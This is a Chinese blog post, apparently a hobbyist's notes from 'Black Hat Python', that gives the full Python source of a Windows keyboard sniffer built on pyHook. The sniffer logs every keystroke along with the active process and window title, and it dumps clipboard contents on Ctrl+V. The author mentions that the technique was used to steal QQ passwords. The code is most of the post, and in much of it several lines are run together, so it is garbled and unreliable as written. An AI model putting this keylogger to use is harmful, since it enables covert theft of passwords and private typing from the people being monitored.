Windows键盘嗅探器
Windows键盘嗅探器
今天,闲的无聊,于是做了一个简单的键盘嗅探器,主要代码来源于《Python黑帽子》,不得不说,这本书写的特别好,带我进入了黑客的编程世界。以前学习编程,只知道常用的功能,不知道怎么入门网络安全方面,当然吗,现在还没有。。。
键盘记录是一个古老的技术,可以捕捉你在键盘上打的字符,从而知道你的隐私信息,以前QQ密码常用的盗窃就是这样实现的,当然了,一山更比一山高,现在最新版的QQ不能获取了,我试探的时候,QQ客户端会随机产生字母出来,完全无法捕捉。
不管了,我们先来看看如何获取键盘的信息,我们需要安装PyHook库,这个库封装了Windows函数SetWindowsHookEx,简称钩子函数,这个函数允许我们安装自定义的钩子函数,当特定的WIndows事件发生,这个钩子函数就会被调用,从而获得按键消息。
我们看代码:
#coding:utf-8
from ctypes import *
import pythoncom
import pyHook
import win32clipboarduser32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = Nonedef get_current_process():#获得前台句柄hwnd = user32.GetForegroundWindow()#获得进程IDpid = c_ulong(0)user32.GetWindowThreadProcessId(hwnd,byref(pid))process_id = '%d' % pid.valueexecutable = create_string_buffer('\x00'*512)h_process = kernel32.OpenProcess(0x400|0x10,False,pid)psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)#读取窗口标题window_title = create_string_buffer("\x00" * 512)length = user32.GetWindowTextA(hwnd, byref(window_title),512)print print "[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value)print kernel32.CloseHandle(hwnd)kernel32.CloseHandle(h_process)####################################
##########钩子核心代码###############
def KeyStroke(event):global current_windowif event.WindowName != current_window:current_window = event.WindowNameget_current_process()# if they pressed a standard keyif event.Ascii > 32 and event.Ascii < 127:print chr(event.Ascii),else:####如果输入的[Ctrl+V],则获得剪贴板内容if event.Key == "V":win32clipboard.OpenClipboard()pasted_value = win32clipboard.GetClipboardData()win32clipboard.CloseClipboard()print "[PASTE] - %s" % (pasted_value),else:print "[%s]" % event.Key,return True
###############钩子管理#######
kl = pyHook.HookManager()
kl.KeyDown = KeyStroke
kl.HookKeyboard()
pythoncom.PumpMessages()
最后运行,就可以获得敲键盘的所以信息了,不要用它干坏事哦!!!
Windows键盘嗅探器相关推荐
- 键盘的扫描码虚拟码概念 常见Windows键盘按键虚拟码
'当用户按下某个键时, ' 1.键盘会检测到这个动作,并通过键盘控制器把扫描码(scan code)传送到计算机: ' 键盘扫描码跟具体的硬件有关的,不同厂商对同一个键的扫描码有可能不同. ...
- WINDOWS键盘事件的挂钩监控原理及其应用技术
WINDOWS键盘事件的挂钩监控原理及其应用技术 WINDOW的消息处理机制为了能在应用程序中监控系统的各种事件消息,提供了挂接 各种反调函数(HOOK)的功能.这种挂钩函数(HOOK)类似扩 ...
- Java中使用JNA实现全局监听Windows键盘事件
title: Java中使用JNA实现全局监听Windows键盘事件 date: 2019-05-02 21:55:00 Java中使用JNA实现全局监听Windows键盘事件 前言: 一直打算做一个 ...
- Windows 键盘快捷键 : Windows 快捷键
Windows 键盘快捷键 标签页和窗口快捷键 Ctrl+N 打开新窗口. Ctrl+T 打开新标签页. Ctrl+Shift+N 在隐身模式下打开新窗口. 按 Ctrl+O,然后选择文件. 在 Go ...
- Windows键盘快捷键使用
Windows键盘快捷键使用 浏览类 弹出地址栏下拉列表 F4 后退到上一个网页 Backspace 后退到上一个网页 Alt + ← 刷新(重新载入) Ctrl + R 刷新(重新载入) F5 全屏 ...
- vs添加监视快捷键_询问操作方法:监视Android移动设备使用情况,Windows键盘快捷键和修复损坏的照片...
vs添加监视快捷键 It's that Ask How-To Geek time of week again; this week we're looking at monitoring Androi ...
- Mac和Windows键盘对应关系
Mac和Windows键盘对应关系 • ⌘ == Command ----- win • ⇧ == Shift ----- shift • ⌥ == Option ----- Alt • ⌃ == C ...
- WINDOWS键盘事件监控原理及应用 (转)
WINDOWS键盘事件监控原理及应用 (转)[@more@]windows键盘事件监控原理及应用 赵桂华 ·逸仙时空 WINDOW的消息处理机制为了能在应用程序中监控系统的各种事件消息,提供了挂接各种 ...
- 读书笔记_键盘嗅探器(2)
为处理READ请求而调用的例程是DispatchRead.下面具体分析该函数: NTSTAUS DispatchRead ( IN PDEVICE_OBJECT pDeviceObject, IN P ...
最新文章
- 独家 | 一文读懂人工神经网络学习原理
- 学习:双机热备、集群、负载均衡、SQL故障转移群集简单理解(转)
- golang python性能_Golang构建Python高性能模块
- W-D-S-UART编程
- python的函数_Python 返回函数+匿名函数
- 记录hiveonspark:Execution Error, return code 30041 from org.apache.hadoop.hive.ql.exec.spark.SparkTask
- svg矩形参数_SVG矩形和其他SVG形状
- raid5 合适 多少块硬盘_分析Linux raid6同步成raid5导致数据丢失的情况
- 计算机基础知识的知识要点,计算机基础知识要点
- 1044. 火星数字(20)-PAT乙级真题
- [来料检验]触摸屏来料检验设想
- 【密码学】一文读懂ZUC算法
- 最新版UI视频解析单页源码附带超清接口
- 迪普交换机恢复出厂设置_【迪普科技官网介绍】迪普科技交换机、防火墙_迪普科技(中国)公司简介-ZOL中关村在线厂商频道...
- ios14描述文件无法与服务器连接,苹果手机的信任在哪里设置(ios14描述文件与设备管理)...
- excel保存快捷键_实例演示:Excel表格数据很少但文件很大,教你如何瘦身缩小...
- 电视剧中的计算机学霸,电视剧中的九位学霸男神,真希望身边有位颜值又高学习又好的男生...
- 解决win10右键桌面出现闪屏问题
- 数据分析_常见的业务分析指标及模型介绍
- mysql优化要点_MySQL优化技巧总结